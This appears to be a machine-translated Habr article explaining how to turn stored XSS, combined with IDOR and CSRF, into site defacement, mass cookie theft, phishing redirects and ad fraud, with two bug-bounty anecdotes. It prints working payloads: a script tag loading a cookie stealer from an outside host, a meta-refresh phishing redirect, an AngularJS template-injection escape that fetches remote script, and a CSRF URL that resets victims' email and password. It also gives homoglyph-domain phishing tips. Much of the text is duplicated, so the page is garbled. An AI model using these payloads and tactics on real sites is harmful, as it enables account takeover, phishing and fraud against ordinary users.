We do deface site using XSS
Deface of the site can be done if you have access to ftp, flooded the shell, etc., but this can also be done using regular XSS. In this article I want to tell you how to use Stored XSS in order to change the contents of the main page of a site or a specific page in order to massively steal cookies from users and redirect to your site .
So, what is deface (Wikipedia):
The main reasons for site deface are:
')
1. Hooliganism, as self-affirmation of novice hackers.
2. Advertising, often of questionable products or services. The site publishes promotional images, links to sites (often infected with viruses), etc.
3. Competition between organizations. One firm brings to a competitor an image and reputational loss through the hacking and deface of their site.
An example from the 12th year .
Stored xss on the main page is most often found (from my experience) on sites that display user activity on the main page. Mainly:
* user added photo 1.jpg;
* user created a topic / blogpost;
* user joined the group;
* User added user as a friend.
We can embed the script in the user name, the name of the photo / group / theme, create a second test account and add it as a friend, so the script will run on the main page.
Even for the code to be executed by a large number of people, it is not necessary to implement it on the main page, you can embed it in the personal accounts of all users, in the comments of some article, or create an ad on the site, for example, country.ua (3 000 place in attendance in Ukraine), filtering in the title and in the description of the ad, but it is not in the username.
1) Stored xss in the comments on the article / topic - everything is simple here, we write js in the comment field, add, catch logs.
2) In order for the code to be executed for each user in the personal account, you need to use xss in conjunction with iDOR . If using idor, you can change the email of any user, restore the account and hack it - this is good, but what if we can change such data, changing which does not lead to anything (for example, editing notes, user addresses, etc.)?
In this case, we need to find a place in the personal account where in the Post or get request you can manipulate the user id, change the data and start searching through all possible id. It is important that there be stored xss.
We can place on the main page the script of theft of cookies , csrf exploit and redirect to a phishing site:
1) Theft cookie script
When we managed to catch cookies, it would be difficult to sort them later, especially the term of many of them ends soon, it will be a plus if the email address of the user is recorded in the cookie (then we can load his account) and the password in md5 (I saw many websites that store passwords in cookies).
If we do not want to spend time sorting cookies or many cookies in httponly , then we can resort to the second option.
2) Redirect to the phishing site of the vulnerable site, link with download of a backdoor or clone paypal / privat24 / sberbank / social network:
3) If there is a private office csrf, we can do a redirect to an exploit csrf example example.com/account?do=settings&email=support1@habrahabr.ru&city=qwqwqw&address=qwqwwqqw&phone=11111111&password=qwerty&confirm_password=qwerty , a script to add a figure to an email and get logins and passwords of users, it will be reasonable to immediately use after an exploit logout csrf https://example.com?logout so that users cannot access their account and restore it.
The interesting thing is that if you do not use a redirect, but simply load js on the page and steal cookies, then the vulnerability may not be noticed for a long time.
How to massively hack users, we have already figured out. Now I will explain how to make money on advertising or to raise your site to the top by attendance.
Instead of doing a redirect to phishing sites, we can raise money from the traffic, like a webmaster, simply “slipping” links with advertising to users. In order to get as much advertising as possible during the time before the vulnerability is fixed, we will load ads in iframes or pop-up windows where they will breed, for example, as these scammers who earn $ 7,000,000 per month with advertising. Many advertisers who are willing to pay for link clicks can be found on the net(not ads) .
2) Back in 2004, the authors of xakep.ru understood how to raise their site to the top by introducing the mail.ru counter to the home site, you can do the same.
Two examples of my deface from real life:
02/04/2017 : Zeprepil vulnerability.
02/04/2017 : The vulnerability is fixed.
02/10/2017 : The $ 200 reward has been transferred. Proved the danger by the fact that this is not the usual xss, but deface.
02/16/2017 : Additional reward is $ 800. Total for this vulnerability $ 1000.
Conclusion from the article : In the case of xss promotion in deface in bug bounty, you can get much more money for this vulnerability.
Previous article .
All information is provided for informational purposes only. I am not responsible for any possible harm caused by the materials of this article.
So, what is deface (Wikipedia):
Deface (English deface - to disfigure, distort) - the type of site hacking, in which the main (or any other) page of a website is replaced with another one - usually of the calling type: advertisement, warning, threat or joke.
Often, access to the rest of the site is blocked, or the former site content is completely removed.
The main reasons for site deface are:
')
1. Hooliganism, as self-affirmation of novice hackers.
2. Advertising, often of questionable products or services. The site publishes promotional images, links to sites (often infected with viruses), etc.
3. Competition between organizations. One firm brings to a competitor an image and reputational loss through the hacking and deface of their site.
An example from the 12th year .
Stored xss on the main page is most often found (from my experience) on sites that display user activity on the main page. Mainly:
* user added photo 1.jpg;
* user created a topic / blogpost;
* user joined the group;
* User added user as a friend.
We can embed the script in the user name, the name of the photo / group / theme, create a second test account and add it as a friend, so the script will run on the main page.
Even for the code to be executed by a large number of people, it is not necessary to implement it on the main page, you can embed it in the personal accounts of all users, in the comments of some article, or create an ad on the site, for example, country.ua (3 000 place in attendance in Ukraine), filtering in the title and in the description of the ad, but it is not in the username.
1) Stored xss in the comments on the article / topic - everything is simple here, we write js in the comment field, add, catch logs.
2) In order for the code to be executed for each user in the personal account, you need to use xss in conjunction with iDOR . If using idor, you can change the email of any user, restore the account and hack it - this is good, but what if we can change such data, changing which does not lead to anything (for example, editing notes, user addresses, etc.)?
In this case, we need to find a place in the personal account where in the Post or get request you can manipulate the user id, change the data and start searching through all possible id. It is important that there be stored xss.
We can place on the main page the script of theft of cookies , csrf exploit and redirect to a phishing site:
1) Theft cookie script
"><script src=https://securityz.net/x.js?> When we managed to catch cookies, it would be difficult to sort them later, especially the term of many of them ends soon, it will be a plus if the email address of the user is recorded in the cookie (then we can load his account) and the password in md5 (I saw many websites that store passwords in cookies).
If we do not want to spend time sorting cookies or many cookies in httponly , then we can resort to the second option.
2) Redirect to the phishing site of the vulnerable site, link with download of a backdoor or clone paypal / privat24 / sberbank / social network:
<meta http-equiv="refresh" content="1;URL=https://securityz.net/vk.html" /> 3) If there is a private office csrf, we can do a redirect to an exploit csrf example example.com/account?do=settings&email=support1@habrahabr.ru&city=qwqwqw&address=qwqwwqqw&phone=11111111&password=qwerty&confirm_password=qwerty , a script to add a figure to an email and get logins and passwords of users, it will be reasonable to immediately use after an exploit logout csrf https://example.com?logout so that users cannot access their account and restore it.
The interesting thing is that if you do not use a redirect, but simply load js on the page and steal cookies, then the vulnerability may not be noticed for a long time.
How to massively hack users, we have already figured out. Now I will explain how to make money on advertising or to raise your site to the top by attendance.
Instead of doing a redirect to phishing sites, we can raise money from the traffic, like a webmaster, simply “slipping” links with advertising to users. In order to get as much advertising as possible during the time before the vulnerability is fixed, we will load ads in iframes or pop-up windows where they will breed, for example, as these scammers who earn $ 7,000,000 per month with advertising. Many advertisers who are willing to pay for link clicks can be found on the net
2) Back in 2004, the authors of xakep.ru understood how to raise their site to the top by introducing the mail.ru counter to the home site, you can do the same.
Two examples of my deface from real life:
- XSS on the main page of the social network privatbank.ua (bug bounty). In this case, the photo is poured into the album, on the main page our name is displayed, in which the redirect to the site, see the video.
- Client Side Template Injection, which I promoted to xss, on the social network of one of the most popular payment systems (2000 alexarank world, 150 alexa Russia).
Unfortunately, this company did not give permission to mention it in the article:We have a negative attitude to such articles.
I also think that the news that a critical vulnerability was found on the website of this payment system, which could harm users, would have a bad effect on the company's reputation.
Previously, social.example.com was the cms of the old generation, it had a lot of xss, which over time was fixed, now made a new cms on angular. I did not find a single xss, I decided to check for template injection, payload{{2+2}}issued 4, determining the angular version, picked up this payload{{a=toString().constructor.prototype;a.charAt=a.trim;$eval('a,alert(1),a')}}
It turned out the stored XSS on the user page in the post. And this xss is performed anywhere on the site: In personal messages, groups, comments, and so on.
But the most important thing is the deface of the main page. When we add a post, it is displayed on everyone on the main page - both by users and guests. Now we can only trigger an alert.
We recall the old article hacking mcdonalds using template injection.
borrow from there payload{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=$.getScript(`https://securityz.net/x.js`)');}}`{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=$.getScript(`https://securityz.net/x.js`)');}}`and we can safely steal cookies or redirect to a phishing site. By the way, there is a life hack on phishing sites - if your victim knows how to look in the url and distinguish web sites, then you can replace one letter in the site name with one that is very similar to it. For example account.goØgle.com, and if there is also ssl, then it will be difficult to distinguish a fake from the original and there will be a lot of logs in conjunction with deface. Latin letters and symbols similar to them .)
02/04/2017 : Zeprepil vulnerability.
02/04/2017 : The vulnerability is fixed.
02/10/2017 : The $ 200 reward has been transferred. Proved the danger by the fact that this is not the usual xss, but deface.
02/16/2017 : Additional reward is $ 800. Total for this vulnerability $ 1000.
Conclusion from the article : In the case of xss promotion in deface in bug bounty, you can get much more money for this vulnerability.
Previous article .
Source: https://habr.com/ru/post/328276/
All Articles